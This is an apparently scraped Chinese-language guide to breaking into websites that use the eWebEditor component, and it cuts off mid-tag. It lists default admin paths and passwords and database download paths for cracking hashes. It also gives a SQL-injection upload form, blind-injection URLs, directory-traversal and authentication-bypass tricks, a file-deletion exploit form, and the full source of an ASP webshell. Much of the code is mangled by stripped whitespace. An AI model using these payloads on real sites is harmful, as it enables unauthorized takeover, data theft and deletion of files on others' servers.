ewebeditor漏洞利用总结.docx

ewebeditor漏洞利用总结先从最基本的记录起！通常入侵ewebeditor编辑器的步骤如下:、首先访问默认管理页看是否存在。默认管理页地址2.80以前为ewebeditor/admin_login.asp以后版本为admin/login.asp2、默认管理帐号密码！默认管理页存在！我们就用帐号密码登陆！默认帐号密码为:adminadmin888！常用的密码还有adminadmin999admin1admin000之类的。3、默认数据库地址。如果密码不是默认的。我们就访问是不是默认数据库！尝试下载数据库得到管理员密码！管理员的帐号密码，都在ewebEditor_System表段里，sys_UserNameSys_UserPass都是md5加密的。得到了加密密码。可以去等网站进行查询！暴力这活好久不干了！也可以丢国外一些可以跑密码的网站去跑!默认数据库路径为:ewebeditor/db/ewebeditor.mdb常用数据库路径为:ewebeditor/db/ewebeditor.asaewebeditor/db/ewebeditor.aspewebeditor/db/#ewebeditor.asaewebeditor/db/#ewebeditor.mdbewebeditor/db/!#ewebeditor.aspewebeditor/db/ewebeditor1033.mdb等很多管理员常改.asp后缀，一般访问.asp.asa后缀的都是乱码！可以用下载工具下载下来，然后更改后缀为.mdb来查看内容！4、说说漏洞基本利用步骤，还以asp为例！登陆后台以后。选择样式管理，默认编辑器的默认样式都不可以修改的。我们可以从任意样式新建一个样式，然后在图片上传添加可上传后缀。.asa.cer.cdx等！.asp过滤过了。但是我们可以用.asaspp后缀来添加，这样上传文件正好被ewebeditor吃掉asp后缀，剩下.asp呵呵！代码不详细说了。总之是个很可笑的过滤！同样，如果遇到一个管理员有安全意识的，从代码里，把.asp.asa.cer.cdx都完全禁止了，我们也可以用.asasaa后缀来突破。添加完了后缀，可以在样式管理，点击预览，然后上传！5、默认管理页不存在！在实际入侵过程中，有很多默认的管理页不存在的时候。我们可以直接访问样式管理页面ewebeditor/admin_style.asp然后用第4步的方式拿webshell。如果样式管理页也不存在的话，我们可以看数据库内的样式表（ewebeditor_style）里面有没有比我们先进去的朋友留下的样式。然后构造上传！具体url如下:ewebEditor/ewebeditor.asp?id=content&style=www红色部分是我们发现被修改添加了asa后缀的样式名，大家自行修改！6、ewebeditor的几个版本存在注入！ewebeditor以前版本都存在注入ewebeditor/ewebeditor.asp?id=article_content&style=Full_v200!添加验证字符串，和管理员字段可以跑出管理员的md5加密密码！ewebeditorv2.1.6存在注入，可以用unionselect添加上传后缀进行上传！先贴漏洞利用方式！-<H3>ewebeditorasp版2.1.6上传漏洞利用程序-</H3><br><br><formaction=/ewebeditor/upload.asp?action=save&type=ImAGE&style=standardunionselectS_ID,S_Name,S_Dir,S_cSS,S_UploadDir,S_width,S_Height,S_memo,S_IsSys,S_FileExt,S_FlashExt,S_ImageExt%2b|cer,S_mediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_mediaSize,S_StateFlag,S_DetectFromword,S_Initmode,S_BaseUrlfromewebeditor_stylewheres_name=standardanda=amethod=postname=myformenctype=multipart/form-data><inputtype=filename=uploadfilesize=100><br><br><inputtype=submitvalue=Fuck></form>-以上代码令存为html！修改红色部分的路径，然后自动上传.cer文件！漏洞原因是因为sStyleName变量直接从style中读取，并没有过滤，所以可以包含任意字符！用select在ewebeditor_style表中查找s_name为sStyleName的记录，找不到就提示出错！在sStyleName变量中用union来构造记录，我们可以在sAllowExt中加入|cer、|asa等！另外还有一些版本的ewebeditor的upload.asp文件存在注入漏洞！贴几个注入用的url！信息错误则返回脚本出错的提示，在浏览器左下角！具体利用如下:ewebeditor/Upload.asp?type=FILE&style=standard_coolblue1and%20)%20from%20ewebeditor_system%20)>98%20and%201=1注意修改红色部分的字段名、位数、ascii码的值！7、目录遍历漏洞！这里大概说一下！目录遍历漏洞基本存在于ewebeditor/admin_uploadfile.asp高版本的是ewebeditor/admin/upload.asp文件！这个文件有的不需要登陆验证，有些需要！很多有经验的管理员会把编辑器的目录设置为只读权限,不可修改！这种情况下，唯一可以利用的也就是利用遍历目录功能查看网站文件，比如数据库路径、后台地址、其他的上传地址、最直观的就是别人留下的小马等等！这些都自由发挥了！说下漏洞利用方法！漏洞利用方式如下:在上传文件管理页面随便选择一个上传样式！比如ewebeditor/admin_uploadfile.asp?id=14在id后面添加&dir=./.类似如下:webeditor/admin_uploadfile.asp?id=14&dir=././././data/可以看到网站数据库的路径！另外一个遍历目录的漏洞文件是ewebeditor/asp/browse.asp漏洞代码为：FunctionGetListDims_List,s_Urls_List=DimoFSo,oUploadFolder,oUploadFiles,oUploadFile,sFileNameResponse.writescurrDironErrorResumeNextSetoFSo=Server.createobjectSetoUploadFolder=oFSo.GetFolder)注意一下scurrDir变量,这个值等下我们可以用到IfErr.Number>0Thens_List=ExitFunctionEndIfIfsDir<>ThenIfInstrRev>1Thens_Url=Left-1)Elses_Url=EndIfs_List=s_List&&_&_.&_&_EndIfResponse.writesDir&!&s_ListDimoSubFolderForEachoSubFolderInoUploadFolder.SubFoldersResponse.writeoUploadFolder.SubFoldersIfsDir=Thens_Url=oSubFolder.NameElses_Url=sDir&/&oSubFolder.NameEndIfs_List=s_List&&_&_&oSubFolder.Name&&_&_NextResponse.writes_ListSetoUploadFiles=oUploadFolder.FilesForEachoUploadFileInoUploadFilesResponse.writeoUploadFile.NamesFileName=oUploadFile.NameIfcheckValidExt=TrueThen这行让人有点郁闷,检测了所有允许的文件后缀,如不允许就无法列出,不然就不只列出目录名和图片文件了IfsDir=Thens_Url=scontentPath&sFileNameElses_Url=scontentPath&sDir&/&sFileNameEndIfs_List=s_List&&_&FileName2Pic&&_&sFileName&&_&GetSizeUnit&&_EndIfNextSetoUploadFolder=NothingSetoUploadFiles=NothingResponse.writeServer.HTmLEncode&!&s_UrlIfsDir=Thens_Url=s_Url=/Elses_Url=/&sDir&s_Url=/&sDir&/EndIfs_List=s_List&s_List=HTmL2jSResponse.writeServer.HTmLEncode&!&s_Urls_List=parent.setDirListGetList=s_ListEndFunction如果没有下面这步检测的话,应该就可以列出目录中所有的文件了,有点郁闷.现在只能列出允许后缀的文件和目录名FunctioncheckValidExtIfsAllowExt=ThencheckValidExt=TrueExitFunctionEndIfDimi,aExt,sExtsExt=Lcase+1)checkValidExt=FalseaExt=Split,|)Fori=0ToUBoundIfaExt=sExtThencheckValidExt=TrueExitFunctionEndIfNextEndFunction我们顺着代码往下找,发现scurrDir的值是通过下面的值得到的SubInitParamsType=Ucase)sStyleName=Trim)Dimi,aStyleconfig,bValidStylebValidStyle=FalseFori=1ToUboundaStyleconfig=Split,|)IfLcase=Lcase)ThenbValidStyle=TrueExitForEndIfNextIfbValidStyle=FalseThenoutScript)EndIfsBaseUrl=aStyleconfignAllowBrowse=cLng)nAllowBrowse=1IfnAllowBrowse<>1ThenoutScript)EndIfsUploadDir=aStyleconfigIfLeft<>/ThenSelectcasesTypecaseREmoTEsUploadDir=././&sUploadDir&Image/caseFILEsUploadDir=././&sUploadDir&other/casemEDIAsUploadDir=././&sUploadDir&media/caseFLASHsUploadDir=././&sUploadDir&Flash/caseElsesUploadDir=././&sUploadDir&Image/EndSelectEndIfsUploadDir=sUploadDir&/SelectcasesBaseUrlcase0scontentPath=aStyleconfigSelectcasesTypecaseREmoTEscontentPath=./&aStyleconfig&Image/caseFILEscontentPath=./&aStyleconfig&other/casemEDIAscontentPath=./&aStyleconfig&media/caseFLASHscontentPath=./&aStyleconfig&Flash/caseElsescontentPath=./&aStyleconfig&Image/EndSelectcase1scontentPath=RelativePath2RootPathcase2scontentPath=RootPath2DomainPath)EndSelectSelectcasesTypecaseREmoTEsAllowExt=aStyleconfigcaseFILEsAllowExt=aStyleconfigcasemEDIAsAllowExt=aStyleconfigcaseFLASHsAllowExt=aStyleconfigcaseElsesAllowExt=aStyleconfigEndSelectscurrDir=sUploadDir注意这里,这个是得到了配置的路径地址sDir=Trim)得到dir变量sDir=Replace对dir变量进行过滤sDir=ReplacesDir=ReplaceIfsDir<>ThenIfcheckValidDir)=TrueThenscurrDir=sUploadDir&sDir&/重点就在这里了,看到没有,当sUploadDir&sDir存在的时候,scurrDir就为sUploadDir&sDir的值了虽然上面对sDir进行了过滤,不过我们完全可以跳过.具体利用下面的利用中给出ElsesDir=EndIfEndIfEndSub利用方式如下:http:/site/ewebeditor/asp/browse.asp?style=standard650&dir=././././admin这样子就可以看到admin的内容了。构造特殊的dir绕过上面的验证!页面空白的时候查看源代码，就可以看到目录列表了！8、session欺骗漏洞！适用于一些设置不当的虚拟主机。当旁注得到一个webshell,而目标站存在ewebeditor却不能找到密码的时候可以尝试欺骗进入后台！顺序如下：新建一个.asp文件，内容如下:<%Session=123132323%>然后访问这个文件，再访问ewebeditor/admin_default.asp！欺骗进入后台！不过很老了！9、后台跳过认证漏洞！访问后台登陆页面！随便输入帐号密码，返回错误！然后清空浏览器，在地址栏输入javascript:alert);javascript:alert);javascript:alert);然后再清空地址栏，在路径里输入后台登陆后的页面，比如:admin_default.aspadmin/default.asp等。直接进入后台，利用方式见上文！0、利用远程上传功能！比如s_full样式就存在这个功能，打开编辑页面，然后图片，选择输入url比如:/1.gif.asp!然后选择上传远程文件！自动就把1.gif.asp保存在上传目录内！注:网上的东西大部分传来传去，这个办法愚弄自己还成！文件的确显示后缀为.asp但是不能访问，因为收集过来的时候自动截止在1.gif了所以后面的.asp等于没有！而且gif的内容就是我们这个url的路径！呵呵，后来又看到一个利用方式！是利用远程搜集的时候执行,我们文件的代码生成另外的小马！利用代码如下:首先建立1.gif.asp代码如下<%Setfs=createobjectSetmyTextStream=fs.openTextFile,1,false,0)Thetext=myTextStream.ReadAllresponse.writethetext%>在我们的1.gif.asp的同目录下建立一个akteam.asp文件，内容就是我们的小马：<%onerrorresumenext%><%ofso=scripting.filesystemobject%><%setfso=server.createobject%><%path=request%><%ifpath<>then%><%data=request%><%setdama=fso.createtextfile%><%dama.writedata%><%iferr=0then%><%=success%><%else%><%=false%><%endif%><%err.clear%><%endif%><%dama.close%><%setdama=nothing%><%setfos=nothing%><%=<formaction=method=post>%><%=<inputtype=textname=path>%><%=<br>%><%=server.mappath)%><%=<br>%><%=%><%=<textareaname=damacols=50rows=10width=30></textarea>%><%=<br>%><%=<inputtype=submitvalue=save>%><%=</form>%>利用上面说的远程上传的方式！可以得到webshell！成功率取决于，虚拟主机的安全设置！1、任意文件删除漏洞！此漏洞存在于ExampleNewsSystem目录下的delete.asp文件中，这是ewebeditor的测试页面，无须登陆可以直接进入！看代码把带|的字符串转为数组DimaSavePathFileNameaSavePathFileName=Split删除新闻相关的文件，从文件夹中DimiFori=0ToUBound按路径文件名删除文件callDoDelFile)Next而aSavePathFileName是前面从数据库取出来的：sSavePathFileName=oRs看看D_SavePathFileName是怎么添加到数据库里的，在addsave.asp里：sSavePathFileName=GetSafeStr).oRs=sSavePathFileName居然过滤了，是GetSafeStr函数，再看看这个函数，在Startup.asp里：FunctionGetSafeStrGetSafeStr=Replace,),chr,),;,)EndFunction既然路径没有过滤，那就可以直接定义了，构造一个提交页面，其中d_savepathfilename自己任意赋值。试试././ewebEditor.asp，提交后删除该新闻，于是主目录下的ewebEditor.asp不见了！漏洞利用:<HTmL><HEAD><TITLE>ewebEditor删除文件byldjun：</td><td><inputtype=textname=d_savepathfilenamevalue=size=90></td></tr><tr><td>新闻标题：</td><td><inputtype=textname=d_titlevalue=size=90></td></tr><tr><td>标题图片：</td><td><selectname=d_picturesize=1><optionvalue=>无</option></select>当编辑区有插入图片时，将自动填充此下拉框</td></tr><tr><td>新闻内容：</td><td><textareaname=d_content></textarea></td></tr></table><inputtype=submitname=btnSubmitvalue=提交><inputtype=resetname=btnResetvalue=重填></form></BoDy></HTmL>删除文件漏洞一般是配合其他漏洞使用的，比如目录遍历<ahref=list.asp>中的list.asp地址要修改<ahref=add.asp>中的add.asp地址要修改<formaction=http